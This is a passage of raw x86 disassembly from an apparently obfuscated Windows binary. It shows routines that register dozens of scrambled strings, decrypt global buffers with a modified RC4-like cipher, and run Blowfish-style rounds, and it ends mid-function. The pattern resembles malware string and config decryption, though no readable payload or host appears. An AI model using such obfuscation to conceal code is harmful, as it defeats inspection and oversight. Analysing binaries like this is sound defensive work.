push offset aZcm1__num3n0oe ; "ZcM1..nUM3N0OE819.1TEYD."
push esi
call sub_41557B
push offset a5_xnq0cowxs0 ; "5.Xnq0cowXs0"
push esi
call sub_41557B
push offset a8y4sz09fdh50tc ; "8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNR"...
push esi
call sub_41557B
push offset aRnyaa0crtpo0yy ; "RNYAA0crTPO0yYB2h.Fe8bw.iRLzu0EdQ3j/1D6"...
push esi
call sub_41557B
push offset aEuior0ay2w7_ ; "EUIOR0ay2w7."
push esi
call sub_41557B
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push esi
call sub_41557B
add esp, 40h
push offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
push esi
call sub_41557B
push offset aTpzyk0moe8_0jt ; "TpzyK0MOE8.0jTPEZ1dC0uG0"
push esi
call sub_41557B
push offset a4ezrg1ye5hp1o2 ; "4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0"
push esi
call sub_41557B
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push esi
call sub_41557B
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push esi
call sub_41557B
push offset a2ms3c_kjtek0 ; "2MS3c.kJTeK0"
push esi
call sub_41557B
push offset aOgyzo1Qmpy1 ; "OGyZo1/qmpy1"
push esi
call sub_41557B
push offset aNI427pnt0 ; "n/i4//27pnT0"
push esi
call sub_41557B
add esp, 40h
push offset aXg4wo0gh6fy0p9 ; "xg4wO0Gh6FY0p9CIj.BYYVY."
push esi
call sub_41557B
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
push esi
call sub_41557B
push offset aQ3bef_grjcn1aa ; "Q3BEf.grJCN1aA/Td0EX07M1"
push esi
call sub_41557B
push offset aPJs70eukyp0 ; "P/JS70EukYp0"
push esi
call sub_41557B
push offset aUDneTzo8s_omqd ; "u/DnE/tzo8s.OMQDW1DERIa/"
push esi
call sub_41557B
push offset a2n67h0pevch1 ; "2n67H0PEVch1"
push esi
call sub_41557B
push offset a5v1zc1efrzg_tc ; "5v1zc1EfRZg.tccap0cH5OH0NHckR.k9Wj.1"
push esi
call sub_41557B
push offset a6f3al1m_ydx05y ; "6f3aL1m.YdX05ythl/YiVnR/jSlje0VWu/50peq"...
push esi
call sub_41557B
add esp, 40h
push offset a3un9w_temux_5y ; "3Un9W.TEMuX.5ythl/YiVnR/J9IiO.VPA7i1"
push esi
call sub_41557B
push offset a7nmru1owjrg0md ; "7NmRu1oWjRG0Md/AN15kOfy.nR01m1pzFKu1"
push esi
call sub_41557B
push offset aNeuf6qyoiMdAn1 ; "NEuF//6QYOi/Md/AN15kOfy.nR01m1pzFKu1"
push esi
call sub_41557B
push offset aNxruj_viib6 ; "nxruJ.vIib6/"
push esi
call sub_41557B
push offset a5gcpxGycn21n1z ; "5GCpx/gYCn21N1Zsj.w3Ty30"
push esi
call sub_41557B
push offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
push esi
call sub_41557B
push offset aPimgt12pvee_ ; "pImgT12pvEE."
push esi
call sub_41557B
push offset aJgyqn0dmzir12z ; "jgYqN0dmziR12zQe40gFoLm.rilJR.uuL/I0"
push esi
call sub_41557B
add esp, 40h
push offset aAqejv_njvii_y8 ; "aQeJV.nJvIi.y8Ri./b5L.q."
push esi
call sub_41557B
pop ecx
pop ecx
pop esi
retn
sub_4155B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162F5 proc near ; CODE XREF: sub_4164D0+18�p
; sub_4164D0+30�p ...
var_394 = byte ptr -394h
var_1EC = byte ptr -1ECh
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 394h
push ebx
push esi
lea eax, [ebp+var_40]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov [ebp+var_40], 0Ah
mov [ebp+var_3F], 0Eh
mov [ebp+var_3E], 20h
mov [ebp+var_3D], 48h
mov [ebp+var_3C], 0Bh
mov [ebp+var_3B], 2Bh
mov [ebp+var_3A], 0Ch
mov [ebp+var_39], 23h
mov [ebp+var_38], 3Ah
mov [ebp+var_37], 27h
mov [ebp+var_36], 28h
mov [ebp+var_35], 5Eh
mov [ebp+var_34], 2Ah
mov [ebp+var_33], 1Eh
mov [ebp+var_32], 2Dh
mov [ebp+var_31], 5Ah
mov [ebp+var_30], 1Bh
mov [ebp+var_2F], 0Fh
mov [ebp+var_2E], 4Ch
mov [ebp+var_2D], 44h
mov [ebp+var_2C], 16h
mov [ebp+var_2B], 4
mov [ebp+var_2A], 57h
mov [ebp+var_29], 23h
mov [ebp+var_28], 11h
mov [ebp+var_27], 53h
mov [ebp+var_26], 38h
mov [ebp+var_25], 13h
mov [ebp+var_24], 0Dh
mov [ebp+var_23], 12h
mov [ebp+var_22], 25h
mov [ebp+var_21], 1Ch
mov [ebp+var_20], 30h
mov [ebp+var_1F], 12h
mov [ebp+var_1E], 50h
mov [ebp+var_1D], 4Fh
mov [ebp+var_1C], 39h
mov [ebp+var_1B], 10h
mov [ebp+var_1A], 42h
mov [ebp+var_19], 1Fh
mov [ebp+var_18], 37h
mov [ebp+var_17], 1Dh
mov [ebp+var_16], 41h
mov [ebp+var_15], 55h
mov [ebp+var_14], 2Ch
mov [ebp+var_13], 41h
mov [ebp+var_12], 2Ch
mov [ebp+var_11], 5Dh
mov [ebp+var_10], bl
call sub_4292D0
mov esi, 1A5h
mov [ebp+var_C], eax
push esi
lea eax, [ebp+var_1EC]
push ebx
push eax
call sub_429690
push esi
lea eax, [ebp+var_394]
push ebx
push eax
call sub_429690
add esp, 1Ch
xor eax, eax
mov ecx, 1A4h
loc_4163FF: ; CODE XREF: sub_4162F5+114�j
mov [ebp+eax+var_1EC], al
inc eax
cmp eax, ecx
jb short loc_4163FF
xor esi, esi
loc_41640D: ; CODE XREF: sub_4162F5+12E�j
cmp edi, [ebp+var_C]
jnz short loc_416414
xor edi, edi
loc_416414: ; CODE XREF: sub_4162F5+11B�j
mov al, [ebp+edi+var_40]
inc edi
mov [ebp+esi+var_394], al
inc esi
cmp esi, ecx
jb short loc_41640D
xor edx, edx
xor edi, edi
loc_416429: ; CODE XREF: sub_4162F5+168�j
movzx ebx, [ebp+edi+var_394]
lea esi, [ebp+edi+var_1EC]
add edx, ebx
mov ebx, ecx
mov al, [esi]
mov [ebp+var_1], al
movzx eax, al
add eax, edx
xor edx, edx
div ebx
inc edi
cmp edi, ecx
lea eax, [ebp+edx+var_1EC]
mov bl, [eax]
mov [esi], bl
mov bl, [ebp+var_1]
mov [eax], bl
jb short loc_416429
xor eax, eax
cmp [ebp+arg_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
jbe short loc_4164CB
jmp short loc_416471
; ---------------------------------------------------------------------------
loc_41646E: ; CODE XREF: sub_4162F5+1D4�j
mov eax, [ebp+var_44]
loc_416471: ; CODE XREF: sub_4162F5+177�j
inc eax
xor edx, edx
mov esi, ecx
mov edi, ecx
div esi
mov [ebp+var_44], edx
lea esi, [ebp+edx+var_1EC]
xor edx, edx
mov bl, [esi]
movzx eax, bl
add eax, [ebp+var_C]
div edi
mov [ebp+var_C], edx
lea eax, [ebp+edx+var_1EC]
mov dl, [eax]
mov [esi], dl
mov edx, [ebp+var_8]
mov [eax], bl
mov eax, [ebp+arg_0]
lea edi, [edx+eax]
movzx eax, byte ptr [esi]
movzx edx, bl
add eax, edx
xor edx, edx
mov esi, ecx
div esi
mov al, [ebp+edx+var_1EC]
xor [edi], al
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jb short loc_41646E
loc_4164CB: ; CODE XREF: sub_4162F5+175�j
pop edi
pop esi
pop ebx
leave
retn
sub_4162F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4164D0 proc near ; CODE XREF: sub_418D49+76�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
xor esi, esi
push edi
push esi
mov edi, offset dword_443990
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_44399C
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_443E48
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_443E6C
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_443E90
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
xor ebx, ebx
cmp [ebp+arg_0], esi
jle short loc_416579
loc_416557: ; CODE XREF: sub_4164D0+A7�j
lea edi, ds:443EE0h[ebx*4]
push esi
push esi
push dword ptr [edi]
call sub_4292D0
pop ecx
push eax
push dword ptr [edi]
call sub_4162F5
add esp, 10h
inc ebx
cmp ebx, [ebp+arg_0]
jl short loc_416557
loc_416579: ; CODE XREF: sub_4164D0+85�j
push esi
mov edi, offset dword_443EF4
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset off_443EF8
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset byte_457F4C
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset byte_457F4D
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_443EFC
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_443F04
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_443F0C
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_443F14
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
mov eax, [ebp+arg_4]
add esp, 10h
cmp eax, esi
jle short loc_41667F
mov edi, offset byte_443FBF
mov [ebp+arg_0], eax
loc_416648: ; CODE XREF: sub_4164D0+1AD�j
lea ebx, [edi-9Fh]
push esi
push esi
push ebx
call sub_4292D0
pop ecx
push eax
push ebx
call sub_4162F5
add esp, 10h
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
add edi, 0B8h
dec [ebp+arg_0]
jnz short loc_416648
loc_41667F: ; CODE XREF: sub_4164D0+16E�j
push esi
mov edi, offset dword_444EF4
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset byte_444FF3
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_445304
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset byte_445403
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_445714
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset byte_445813
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset a3c9 ; "]&3c9"
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_4439A4
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
push esi
mov edi, offset dword_443A3C
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset byte_443B3B
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_4439B0
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
mov edi, offset dword_4439CC
push esi
push esi
push edi
call sub_4292D0
pop ecx
push eax
push edi
call sub_4162F5
add esp, 10h
push esi
push esi
mov esi, offset loc_4439E8
push esi
call sub_4292D0
pop ecx
push eax
push esi
call sub_4162F5
add esp, 10h
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4164D0 endp
; =============== S U B R O U T I N E =======================================
sub_4167BC proc near ; CODE XREF: sub_417010+65�p
; sub_41714C+68�p
var_8 = dword ptr -8
push esi
push 48h
mov esi, ecx
call sub_42B407
mov [esi], eax
mov [esp+8+var_8], 13A0h
call sub_42B407
mov [esi+4], eax
pop ecx
mov eax, esi
pop esi
retn
sub_4167BC endp
; =============== S U B R O U T I N E =======================================
sub_4167DC proc near ; CODE XREF: sub_417010+12B�p
; sub_41714C+13F�p
push esi
mov esi, ecx
push dword ptr [esi]
call sub_429006
push dword ptr [esi+4]
call sub_429006
pop ecx
pop ecx
pop esi
retn
sub_4167DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167F2 proc near ; CODE XREF: sub_416ED6+C0�p
; sub_416ED6+F3�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ecx]
mov edx, [eax]
mov eax, [ecx+4]
xor ecx, ecx
xor edx, [edi]
xor ebx, ebx
mov [ebp+var_C], edi
mov [ebp+var_4], edx
mov esi, edx
mov cl, byte ptr [ebp+var_4+2]
mov bl, dh
shr esi, 18h
mov ecx, [eax+ecx*4+4E8h]
add ecx, [eax+esi*4]
mov esi, 0FFh
and edx, esi
xor ecx, [eax+ebx*4+9D0h]
add ecx, [eax+edx*4+0EB8h]
mov edx, [ebp+arg_4]
xor ecx, [edi+4]
xor ecx, [edx]
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+8]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+0Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+10h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+14h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+18h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+1Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+20h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+24h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor edx, [edi+28h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
xor ebx, ebx
add edx, [eax+edi*4]
mov bl, byte ptr [ebp+var_4+1]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+2Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+30h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+34h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+38h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+3Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
mov eax, [ebp+var_4]
xor edx, [edi+40h]
xor eax, edx
mov edx, [ebp+arg_4]
xor ecx, [edi+44h]
pop edi
mov [edx], eax
mov eax, [ebp+arg_0]
pop esi
pop ebx
mov [eax], ecx
leave
retn 8
sub_4167F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B63 proc near ; CODE XREF: sub_41714C+D5�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ecx]
xor ebx, ebx
mov [ebp+var_C], edi
mov edx, [edi+44h]
xor edx, [eax]
mov eax, [ecx+4]
xor ecx, ecx
mov [ebp+var_4], edx
mov esi, edx
mov cl, byte ptr [ebp+var_4+2]
mov bl, dh
shr esi, 18h
mov ecx, [eax+ecx*4+4E8h]
add ecx, [eax+esi*4]
mov esi, 0FFh
and edx, esi
xor ecx, [eax+ebx*4+9D0h]
add ecx, [eax+edx*4+0EB8h]
mov edx, [ebp+arg_4]
xor ecx, [edi+40h]
xor ecx, [edx]
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+3Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+38h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+34h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+30h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+2Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+28h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+24h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+20h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor edx, [edi+1Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
xor ebx, ebx
add edx, [eax+edi*4]
mov bl, byte ptr [ebp+var_4+1]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+18h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+14h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+10h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+0Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+8]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
mov eax, [ebp+var_4]
xor edx, [edi+4]
xor eax, edx
mov edx, [edi]
xor edx, ecx
